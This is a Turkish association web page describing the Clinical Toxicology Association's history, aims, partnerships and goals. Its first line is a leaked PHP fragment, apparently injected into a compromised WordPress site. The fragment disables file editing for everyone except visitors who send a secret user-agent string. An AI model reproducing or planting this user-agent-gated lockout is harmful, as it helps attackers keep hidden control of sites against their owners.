if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } DERNEĞİMİZ - Klinik Toksikoloji Derneği
Klinik Toksikoloji Derneği
 

KLİNİK TOKSİKOLOJİ DERNEĞİ HAKKINDA

Ülkemizde Klinik Toksikoloji Derneği, 1 Mayıs 1996 tarihinde 16.23.119 kod numarası ile kurulmuştur.

Merkezi Bursa olup Ankara, İzmir ve Trabzon’da olmak üzere üç adet temsilciliğimiz bulunmaktadır.

 

Klinik Toksikoloji Derneği kuruluşunun amacı;

  • Toksikoloji ile bilimsel konuları görüşmek, tartışmak, yayınlamak.
  • Klinik Toksikoloji alanındaki çalışmaları teşvik etmek, bu konuda doktorların daha yüksek düzeylerde eğitimlerinde yol gösterici olmak.
  • Dernek üyelerinin faaliyetlerini koordine etmek.
  • Üyeler arasında işbirliğini kurmak ve bunu teşvik etmek.
  • Eğitim amaçlı panel, sempozyum ve kongre düzenlemek

olarak kısaca özetlenebilir.

 
 

Ülkemizdeki tıp fakültelerinin ve eğitim araştırma hastanelerinin tamamına yakınında derneğimizin üyeleri bulunmaktadır. Tamamına yakını anesteziyoloji ve reanimasyon uzmanı olan üyelerimizin katkılarıyla, derneğimiz ülkenin çeşitli bölgelerine giderek bu bölgelere özgü sorunları saptayarak toksikolojik açıdan o bölgeye katkıda bulunmaktadır. Derneğimiz ayrıca, tıp eğitimleri sırasında, toksikoloji konusunda yetersiz öğrenim gördüğü düşünülen doktorlarımıza ulaşarak bu eksikliği bir nebze olsun gidermek amacı gütmektedir.

Her yıl düzenli olarak yaptığımız bilimsel toplantılarımıza, Üniversiteler, Sağlık Bakanlığı, GATA v.b. gibi kurumlardan katılan bilim insanlarının büyük katkıları bulunmaktadır. Ayrıca bu toplantılarda katılımcılar birbirleri ile tanışma ve ortak proje yapma olanağı da bulmaktadırlar.

Derneğimizin organize ettiği bu toplantılarda ele alınan ana konuların dışında ilginç olgu sunumları, istatistiksel ve klinik çalışmalarla Türkiye verileri gündeme getirilmekte, genç araştırmacıların eğitimleri ve sunu yaparak katkıda bulunmaları sağlanmaktadır.

 
 
 

Dernek tüzüğümüzde de yer verilen “Dernekler Kanunu’nun kurallarına uygun kurulmuş derneklerle ortaklaşa toplantı ve çalışmalar yapar” ifadesi gereği yapılan çalışmalarımız arasında;

 

Türk Anesteziyoloji ve Reanimasyon Derneği ile işbirliği

Derneğimiz Mayıs 1996 tarihinde kurulmuş olup üyelerimizin tamamına yakını Anesteziyoloji ve Reanimasyon uzmanı olup, bunların da çoğu TARD üyesidir. Her yıl düzenli olarak ve uluslararası katılımlı olarak düzenlenen TARD Kongrelerinde, derneğimiz üyeleri panelist, konuşmacı ve bildiri sunarak katkıda bulunmaktadır.

Türk Yoğunbakım Derneği ile işbirliği

Her iki yılda bir düzenli olarak ve uluslararası katılımlı olarak düzenlenen Türk Yoğun Bakım Derneği Kongrelerinde, derneğimiz üyeleri, konuşmacı, panelist olarak ya da bildiri sunarak katkıda bulunmaktadır.

Adli Bilimciler Derneği ile işbirliği – Disiplinlerarası Toksikoloji Kongresi

Farklı bilim dallarında toksikoloji konusuyla ilgili bilim insanlarının biraraya gelmesini sağlayan ve derneğimizin öncülüğünde gerçekleştirilen I. Disiplinlerarası Toksikoloji Kongresi 20 -22 Nisan 2005 tarihleri arasında; II. Disiplinlerarası Toksikoloji Kongresi ise 18 -20 Mayıs 2007 tarihleri arasında gerçekleştirilmiştir.

 
 
 

Diğer Faaliyetler:

 

Derneğin kurulduğu aynı yıl, Uludağ Üniversitesi Tıp Fakültesi Hastanesinde “Uludağ Zehir Danışma Merkezi” de kurulmuş ve bu merkez derneğin kurucularından oluşan bir grupla 24 saat danışmanlık hizmeti vermiştir. Telefon ve faksla ülkenin ve Marmara Bölgesinin çeşitli yörelerinden gelen başvurulara cevap veren merkez, uzun yıllar derneğin merkezi olarak da görev yapmıştır.

Halkı bilgilendirmek amacı ile çeşitli toplantılar düzenlenmiş; yazılı ve görsel medyada konu işlenmiş; genel ve bölgesel zehirlenme hakkında broşürler yayınlanarak dağıtılmıştır.

15 -16 Kasım 2007 tarihinde İstanbul Askeri Müze ve Kültür Sitesinde, Kasımpaşa Asker hastanesi Komutanlığınca düzenlenen “Boğaz Kazaları ve Toksik Kimyasal Maddelerin İnsan-Çevre Sağlığına Etkileri Sempozyumu”nun hem organizasyonunda hem de konuşmacı olarak derneğimiz üyeleri yer almıştır.

T.C Sağlık Bakanlığı Hıfzısıhha Mektebi tarafından I. Basamak Sağlık Mensuplarına yönelik “Zehirlenmeler ve Tedavi” kitabının hazırlanması çalışmalarına derneğimizin kurucu başkanı Prof.Dr.Gürayten Özyurt katılmıştır.

Derneğimizin aktiviteleri sırasında Klinik Toksikoloji üst eğitiminin gerekliliği vurgulanmış; bu konudaki yandal açılması için yetkili kurumlara başvurular yapılmış olup bu konudaki gelişmeler derneğimiz yönetimince takip edilmektedir.

Derneğimiz üyelerinin lisansüstü eğitim yapmaları özendirilmiş, bunun sonucu olarak üyelerimiz, Klinik Toksikoloji alanında doktora çalışmalarını tamamlayarak “toksikoloji bilim doktoru” ünvanını almış bulunmaktadırlar.

 
 
 
 

Sonuç:

 

Yukarıda söz edilen 18 yıllık süreçte çalışmalarımız son derece kısıtlı olanaklarla üyelerimizin büyük özverileriyle gerçekleştirilmiştir. On sekiz yılık süre sonunda gittikçe artan üye sayımız ve ortaya konulan çalışmalarımız ile daha ileri hedefler belirleme ve gerçekleştirme aşamasındayız.

 

İleri hedeflerimiz:

Anesteziyoloji anabilim dalı çatısı altında, klinik toksikoloji bilim dalının oluşması için girişimlerde bulunmak,

Bu girişimlerin sonuç vermesi halinde Klinik Toksikoloji yan dalında ülkemizin ihtiyacı bulunan yan dal uzmanlarının yetişmesini özendirmek ve sağlamak,

Uluslararası Klinik Toksikoloji Kongrelerine, derneğimiz üyelerinin konuşmacı, panelist ve bildirili olarak daha çok sayıda katılımlarını desteklemek,

Ulusal ve özellikle uluslararası yapılacak bilimsel toplantılarda derneğimizin “Türk Klinik Toksikoloji Derneği” ismiyle yer alması için girişimlerde bulunmaktır.

 
Social media & sharing icons powered by UltimatelySocial
YouTube
WhatsApp